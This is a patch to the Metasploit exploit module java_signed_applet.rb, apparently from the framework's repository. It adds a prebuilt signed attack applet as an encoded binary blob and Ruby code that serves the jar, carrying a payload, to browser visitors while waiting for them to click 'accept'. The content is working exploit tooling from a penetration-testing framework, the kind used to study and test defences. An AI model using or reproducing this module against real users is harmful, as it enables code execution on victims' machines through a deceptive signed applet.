From 3ecabe1be922118caff7283958ed9d402a10a0d9 Mon Sep 17 00:00:00 2001 From: natron <> Date: Fri, 29 Jan 2010 19:47:40 +0000 Subject: [PATCH] Adds static signed jar and user messages letting them know. git-svn-id: file:///home/svn/framework3/trunk@8328 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/java_signed_applet.jar | Bin 0 -> 5340 bytes .../multi/browser/java_signed_applet.rb | 65 +++++++++++------- 2 files changed, 42 insertions(+), 23 deletions(-) create mode 100644 data/exploits/java_signed_applet.jar diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar new file mode 100644 index 0000000000000000000000000000000000000000..a1410036b5da477053f32257f2117d904947518f GIT binary patch literal 5340 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 BaG3xA literal 0 HcmV?d00001 diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 4da6660e11..a32d5eb950 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote # Currently doing all processing in on_request_uri. # If this is too slow, we can move applet generation up here. # + + @use_static = false + + if not @jvm_init + print_error + print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable." + print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." + print_error + @use_static = true + end super end @@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet end end - appletcode = get_code(cli) + if not @use_static + appletcode = get_code(cli) - print_status "Compiling applet classes..." - compile( appletcode['classnames'], appletcode['codefiles'] ) + print_status "Compiling applet classes..." + compile( appletcode['classnames'], appletcode['codefiles'] ) - print_status "Compile completed. Building jar file..." + print_status "Compile completed. Building jar file..." - unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" - @signedjar = "#{datastore['APPLETNAME']}.jar" + unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" + @signedjar = "#{datastore['APPLETNAME']}.jar" - build_jar( unsignedjar, - [ # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) - - print_status "Jar built. Signing..." + build_jar( unsignedjar, + [ # Applet + datastore['APPLETNAME'] + ".class", + # PayloadX class + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", + # PayloadX StreamConnector for pure Java payload + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) + + print_status "Jar built. Signing..." + + sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) + + print_status "Jar signed. Ready to send." + else + print_status "Using static, signed jar. Ready to send." + end - sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - - print_status "Jar signed. Ready to send." - # TODO: gzip data and parse in java send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end # load the jar file - if File.exists? File.join( datastore['JAVACACHE'], @signedjar ) - path = File.join( datastore['JAVACACHE'], @signedjar ) - fd = File.open( path, "rb" ) + if @use_static + path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) + elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) + path = File.join( datastore['JAVACACHE'], @signedjar ) + end + + if path + fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close end - + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )